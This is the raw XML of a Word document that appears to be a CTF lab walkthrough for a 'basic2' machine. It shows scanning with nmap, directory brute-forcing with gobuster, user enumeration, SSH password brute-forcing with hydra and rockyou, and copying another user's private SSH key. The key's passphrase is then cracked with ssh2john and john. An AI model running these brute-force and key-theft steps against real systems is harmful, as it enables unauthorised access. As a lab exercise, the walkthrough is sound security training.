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9B7C3" w14:textId="77777777" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r>
        <w:t>Q1. Deploy the machine and connect to our network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD54D67" w14:textId="3BEC9C16" w:rsidR="00B86189" w:rsidRDefault="00D36FE9">
      <w:r w:rsidRPr="00D36FE9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="528C0FBA" wp14:editId="33681B50">
            <wp:extent cx="5731510" cy="4197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14:paraId="64605636" w14:textId="77777777" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808"/>
    <w:p w14:paraId="7ADF5E21" w14:textId="58698D58" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r>
        <w:t>Q2. Find the services exposed by the machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C8201D" w14:textId="77777777" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r>
        <w:t>Basic scan using nmap on IP = 10.10.16.60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0584CC4F" w14:textId="77777777" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r>
        <w:t>Ports are</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529EA905" w14:textId="77777777" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r>
        <w:t>22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC7191B" w14:textId="77777777" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r>
        <w:t>80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101AF70E" w14:textId="77777777" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r>
        <w:t>139</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75848A2E" w14:textId="77777777" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r>
        <w:t>445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B60C74" w14:textId="77777777" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r>
        <w:t>8009</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682BFC53" w14:textId="4DC31C2D" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r>
        <w:t>8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511CCB01" w14:textId="5ED84F60" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4519AA9D" wp14:editId="64597EFD">
            <wp:extent cx="5731510" cy="5264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F616" w14:textId="0E559F54" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808"/>
    <w:p w14:paraId="05CE0BCC" w14:textId="4CA74004" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808"/>
    <w:p w14:paraId="474FA80E" w14:textId="55EEE951" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808"/>
    <w:p w14:paraId="4979A629" w14:textId="5AE855A6" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808"/>
    <w:p w14:paraId="1E2AAA95" w14:textId="65DED178" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808"/>
    <w:p w14:paraId="3016E367" w14:textId="791EB517" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808"/>
    <w:p w14:paraId="2A1628EB" w14:textId="2F2C9910" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808"/>
    <w:p w14:paraId="5CF8BE8C" w14:textId="4DB2E27E" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808"/>
    <w:p w14:paraId="62A7C93F" w14:textId="59E06F0B" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808"/>
    <w:p w14:paraId="1210EE30" w14:textId="2E8E5E36" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808"/>
    <w:p w14:paraId="28897799" w14:textId="3CBDEFC4" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808"/>
    <w:p w14:paraId="5DA3FB1B" w14:textId="77777777" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808"/>
    <w:p w14:paraId="0444ED72" w14:textId="7068DDC4" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Q3. </w:t>
      </w:r>
      <w:r w:rsidRPr="004428A2">
        <w:t>What is the name of the hidden directory on the web server(enter name without /)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02109680" w14:textId="76E530E4" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="081CC329" wp14:editId="6D05B09E">
            <wp:extent cx="5731510" cy="606425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A538" w14:textId="7B52D29D" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r w:rsidRPr="004428A2">
        <w:t>/usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3366BE0F" w14:textId="3DD0A6FC" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5226CEC2" wp14:editId="78325415">
            <wp:extent cx="5731510" cy="1719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E70B" w14:textId="1F7D6411" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r w:rsidRPr="00694808">
        <w:lastRenderedPageBreak/>
        <w:t>sudo gobuster dir -u 10.10.16.60 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2874B4D9" w14:textId="455CD7AB" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r>
        <w:t xml:space="preserve">Q4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00694808">
        <w:t>User brute-forcing to find the username &amp; password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A1A8F4" w14:textId="51C40051" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r>
        <w:t xml:space="preserve">Q5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00013E95">
        <w:t>What is the username?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDB637F" w14:textId="363D56EE" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r>
        <w:t>Q9. What is the name of the other user you found(all lower case)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C5FE43" w14:textId="6E58A7E4" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r w:rsidRPr="00694808">
        <w:t>enum4linux -a 10.10.16.60 | tee userenum.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2DBC07" w14:textId="292F435D" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="740950BF" wp14:editId="4F0F85CF">
            <wp:extent cx="5362222" cy="496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86" cy="49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1430" w14:textId="35AA8F2C" w:rsidR="00694808" w:rsidRDefault="003F3460" w:rsidP="00694808">
      <w:r w:rsidRPr="003F3460">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B435131" wp14:editId="4D247086">
            <wp:extent cx="5394960" cy="156421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799" cy="156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30CE" w14:textId="31A696D6" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r>
        <w:t>jan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2513BAB5" w14:textId="62667E19" w:rsidR="00694808" w:rsidRDefault="00694808" w:rsidP="00694808">
      <w:r>
        <w:t>kay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11006FA2" w14:textId="0ADADC54" w:rsidR="003F3460" w:rsidRDefault="003F3460" w:rsidP="003F3460">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q6. What is the password?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09432EE0" w14:textId="432F8A8F" w:rsidR="00A46F34" w:rsidRDefault="00A46F34" w:rsidP="003F3460">
      <w:r w:rsidRPr="00A46F34">
        <w:t>sudo hydra -l jan -P /usr/share/wordlists/rockyou.txt.gz $IP ssh -t 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E35AA8" w14:textId="674DA26D" w:rsidR="00FA6C12" w:rsidRDefault="00C0375E" w:rsidP="003F3460">
      <w:r w:rsidRPr="00C0375E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="285D1AAC" wp14:editId="16D5019E">
            <wp:extent cx="5410669" cy="1798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5032" w14:textId="0BE88B84" w:rsidR="003F3460" w:rsidRDefault="003F3460" w:rsidP="003F3460">
      <w:r>
        <w:t xml:space="preserve">Q7. </w:t>
      </w:r>
      <w:r w:rsidRPr="003F3460">
        <w:t>What service do you use to access the server(answer in abbreviation in all caps)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733CFFF9" w14:textId="3EBD3EC1" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="003F3460">
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF8FD91" w14:textId="38D4F75A" w:rsidR="003F3460" w:rsidRDefault="003F3460" w:rsidP="003F3460">
      <w:r>
        <w:t>Q8. Enumerate the machine to find any vectors for privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D22192D" w14:textId="67B69A56" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="003F3460">
      <w:r w:rsidRPr="00FA6C12">
        <w:t>ssh jan@$IP -p 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9903FD" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>jan@basic2:~$ whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323AD5BB" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>jan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16263217" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>jan@basic2:~$ cd /home</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525C56F3" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>jan@basic2:/home$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8083C4" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>jan  kay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4BC7BA" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>jan@basic2:/home$ cd kay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1239F607" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>jan@basic2:/home/kay$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A01AA5" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>pass.bak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2B1D4F" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>jan@basic2:/home/kay$ ls -all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1032B9" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>total 48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A76A092" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FAF82D" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>drwxr-xr-x 4 root root 4096 Apr 19  2018 ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0FA8FE" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>-rw------- 1 kay  kay   756 Apr 23  2018 .bash_history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D2FF85" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>-rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA19D0F" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>-rw-r--r-- 1 kay  kay  3771 Apr 17  2018 .bashrc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09131927" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>drwx------ 2 kay  kay  4096 Apr 17  2018 .cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB89255" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>-rw------- 1 root kay   119 Apr 23  2018 .lesshst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD2A451" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>drwxrwxr-x 2 kay  kay  4096 Apr 23  2018 .nano</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF67E4F" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>-rw------- 1 kay  kay    57 Apr 23  2018 pass.bak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71587017" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>-rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D128ED" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>drwxr-xr-x 2 kay  kay  4096 Apr 23  2018 .ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1BEEA1" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>-rw-r--r-- 1 kay  kay     0 Apr 17  2018 .sudo_as_admin_successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399E6ADC" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>-rw------- 1 root kay   538 Apr 23  2018 .viminfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7641A2" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>jan@basic2:/home/kay$ cat pass.bak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC090D0" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="00FA6C12">
      <w:r>
        <w:t>cat: pass.bak: Permission denied</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670BEBEA" w14:textId="697DE127" w:rsidR="00FA6C12" w:rsidRDefault="00C0375E" w:rsidP="003F3460">
      <w:r w:rsidRPr="00C0375E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D3386C3" wp14:editId="5CC5A867">
            <wp:extent cx="4801016" cy="527349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9D4D" w14:textId="77777777" w:rsidR="00EB7AB1" w:rsidRDefault="00EB7AB1" w:rsidP="003F3460"/>
    <w:p w14:paraId="26B2EA58" w14:textId="77777777" w:rsidR="00FA6C12" w:rsidRDefault="00FA6C12" w:rsidP="003F3460"/>
    <w:p w14:paraId="7D8E39DA" w14:textId="12A16CD9" w:rsidR="003F3460" w:rsidRDefault="003F3460" w:rsidP="003F3460">
      <w:r>
        <w:t>Q10. If you have found another user, what can you do with this information?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F76B3C" w14:textId="77777777" w:rsidR="00EB7AB1" w:rsidRDefault="00EB7AB1" w:rsidP="00EB7AB1">
      <w:r>
        <w:t>jan@basic2:/home/kay$ cat .ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D99D9C" w14:textId="77777777" w:rsidR="00EB7AB1" w:rsidRDefault="00EB7AB1" w:rsidP="00EB7AB1">
      <w:r>
        <w:t>cat: .ssh: Is a directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E804815" w14:textId="77777777" w:rsidR="00EB7AB1" w:rsidRDefault="00EB7AB1" w:rsidP="00EB7AB1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jan@basic2:/home/kay$ cd .ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5A2260" w14:textId="77777777" w:rsidR="00EB7AB1" w:rsidRDefault="00EB7AB1" w:rsidP="00EB7AB1">
      <w:r>
        <w:t>jan@basic2:/home/kay/.ssh$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE5810F" w14:textId="77777777" w:rsidR="00EB7AB1" w:rsidRDefault="00EB7AB1" w:rsidP="00EB7AB1">
      <w:r>
        <w:t>authorized_keys  id_rsa  id_rsa.pub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05950188" w14:textId="40687328" w:rsidR="00EB7AB1" w:rsidRDefault="00EB7AB1" w:rsidP="00EB7AB1">
      <w:r>
        <w:t>jan@basic2:/home/kay/.ssh$ cat id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02169A94" w14:textId="4C11BEED" w:rsidR="00EB7AB1" w:rsidRDefault="00EB7AB1" w:rsidP="00EB7AB1">
      <w:r w:rsidRPr="00EB7AB1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16709C68" wp14:editId="792CF075">
            <wp:extent cx="5509737" cy="604318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ED7" w14:textId="49C01B90" w:rsidR="00EB7AB1" w:rsidRDefault="00EB7AB1" w:rsidP="00EB7AB1">
      <w:r w:rsidRPr="00EB7AB1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74B227E7" wp14:editId="71B1B6D6">
            <wp:extent cx="4625741" cy="1074513"/>
            <wp:effectExtent l="0" t="0" r="381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4BD6" w14:textId="151E6DDE" w:rsidR="00EB7AB1" w:rsidRDefault="00EB7AB1" w:rsidP="00EB7AB1">
      <w:r>
        <w:t>Copy the rsa private key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B698CC7" w14:textId="3DEC2805" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="00EB7AB1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>And create the file kat_idrsa using mousepad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C82E3F" w14:textId="600405EE" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="00EB7AB1">
      <w:r w:rsidRPr="00BE0C3C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F48B394" wp14:editId="731DF9C6">
            <wp:extent cx="5121084" cy="6111770"/>
            <wp:effectExtent l="0" t="0" r="381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75F9" w14:textId="3BABA657" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="00EB7AB1">
      <w:r w:rsidRPr="00BE0C3C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F65E0CF" wp14:editId="626E4721">
            <wp:extent cx="4359018" cy="169178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19EB" w14:textId="14A96FBB" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="00EB7AB1">
      <w:r>
        <w:t>Check the file is read only or read and write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433002F8" w14:textId="474020B6" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="00EB7AB1">
      <w:r>
        <w:t>ls -pals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6554DB16" w14:textId="0233D3D1" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="00EB7AB1">
      <w:r w:rsidRPr="00BE0C3C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="015FC12B" wp14:editId="0FFA6961">
            <wp:extent cx="4407880" cy="143256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570" cy="14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A968" w14:textId="293D6789" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="00EB7AB1">
      <w:r>
        <w:t>Convert the kay_idrsa into the hash format so that john will able to read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B9B1DC" w14:textId="24D2B88E" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="00EB7AB1">
      <w:r>
        <w:t>First locate ssh2john python file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688C7E9F" w14:textId="0A6B57D2" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="00EB7AB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2847C68C" wp14:editId="30E63426">
            <wp:extent cx="3444240" cy="7086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98B63" w14:textId="77976883" w:rsidR="00EB7AB1" w:rsidRDefault="00BE0C3C" w:rsidP="003F3460">
      <w:r>
        <w:t>Convert it into hash file using the below command and save in new file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069158F0" w14:textId="478C7878" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="003F3460">
      <w:r w:rsidRPr="00BE0C3C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D73996C" wp14:editId="56D1BEAB">
            <wp:extent cx="3863675" cy="426757"/>
            <wp:effectExtent l="0" t="0" r="381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5EF8" w14:textId="57527CE9" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="003F3460">
      <w:r>
        <w:t>With the help of john we will find the john paraphase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128ED103" w14:textId="48024C2F" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="003F3460">
      <w:r w:rsidRPr="00BE0C3C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F78AF51" wp14:editId="288D18EF">
            <wp:extent cx="5731510" cy="158369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8C3B" w14:textId="05C251DA" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="003F3460"/>
    <w:p w14:paraId="0ACAC4B5" w14:textId="1FE90330" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="003F3460"/>
    <w:p w14:paraId="492BFB17" w14:textId="374C731A" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="003F3460"/>
    <w:p w14:paraId="0AE88CCF" w14:textId="166E84F1" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="003F3460"/>
    <w:p w14:paraId="28EEDDAE" w14:textId="6EBB24AA" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="003F3460"/>
    <w:p w14:paraId="1C7A8067" w14:textId="229C9F99" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="003F3460"/>
    <w:p w14:paraId="6DA3828D" w14:textId="34D4507D" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="003F3460"/>
    <w:p w14:paraId="5020893A" w14:textId="0B3D4A4B" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="003F3460"/>
    <w:p w14:paraId="4957D904" w14:textId="4A2D4A04" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="003F3460"/>
    <w:p w14:paraId="467D53F2" w14:textId="510A323F" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="003F3460"/>
    <w:p w14:paraId="0F3671BB" w14:textId="77777777" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="003F3460"/>
    <w:p w14:paraId="711497C3" w14:textId="246F02D8" w:rsidR="003F3460" w:rsidRDefault="003F3460" w:rsidP="003F3460">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q11. What is the final password you obtain?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE60744" w14:textId="3457CEE5" w:rsidR="00694808" w:rsidRDefault="00BE0C3C" w:rsidP="00694808">
      <w:r>
        <w:t>Convert kay_idrsa from read write format to read only format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A8ED07" w14:textId="36B5DA6B" w:rsidR="00BE0C3C" w:rsidRDefault="00BE0C3C" w:rsidP="00694808">
      <w:r w:rsidRPr="00BE0C3C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="515DE853" wp14:editId="1AA6A2DA">
            <wp:extent cx="4648603" cy="34521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F948" w14:textId="13EB0104" w:rsidR="00BE0C3C" w:rsidRDefault="00EF085F" w:rsidP="00694808">
      <w:r>
        <w:t xml:space="preserve">With the help of </w:t>
      </w:r>
      <w:r w:rsidR="00D36FE9">
        <w:t>passphrase,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we will login into kay account and check pass.bak file to get the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F432910" w14:textId="45877D01" w:rsidR="00EF085F" w:rsidRDefault="00EF085F" w:rsidP="00694808">
      <w:r w:rsidRPr="00EF085F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BCAE0B6" wp14:editId="711B75EA">
            <wp:extent cx="5128704" cy="2286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7E3" w14:textId="553A9380" w:rsidR="00EF085F" w:rsidRDefault="00EF085F" w:rsidP="00694808">
      <w:r>
        <w:t xml:space="preserve">Final password is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43396F30" w14:textId="45E4F53A" w:rsidR="00EF085F" w:rsidRDefault="00EF085F" w:rsidP="00694808">
      <w:r w:rsidRPr="00EF085F">
        <w:t>heresareallystrongpasswordthatfollowsthepasswordpolicy$$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2A5DF9" w14:textId="77777777" w:rsidR="00694808" w:rsidRDefault="00694808"/>
    <w:sectPr w:rsidR="006948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808"/>
    <w:rsid w:val="003F3460"/>
    <w:rsid w:val="00694808"/>
    <w:rsid w:val="00A46F34"/>
    <w:rsid w:val="00B86189"/>
    <w:rsid w:val="00BE0C3C"/>
    <w:rsid w:val="00C0375E"/>
    <w:rsid w:val="00D36FE9"/>
    <w:rsid w:val="00EB7AB1"/>
    <w:rsid w:val="00EF085F"/>
    <w:rsid w:val="00FA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579BC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AA4E1F01-CFFB-40A5-89F8-D0C83F870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8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Jaiswal</dc:creator>
  <cp:keywords/>
  <dc:description/>
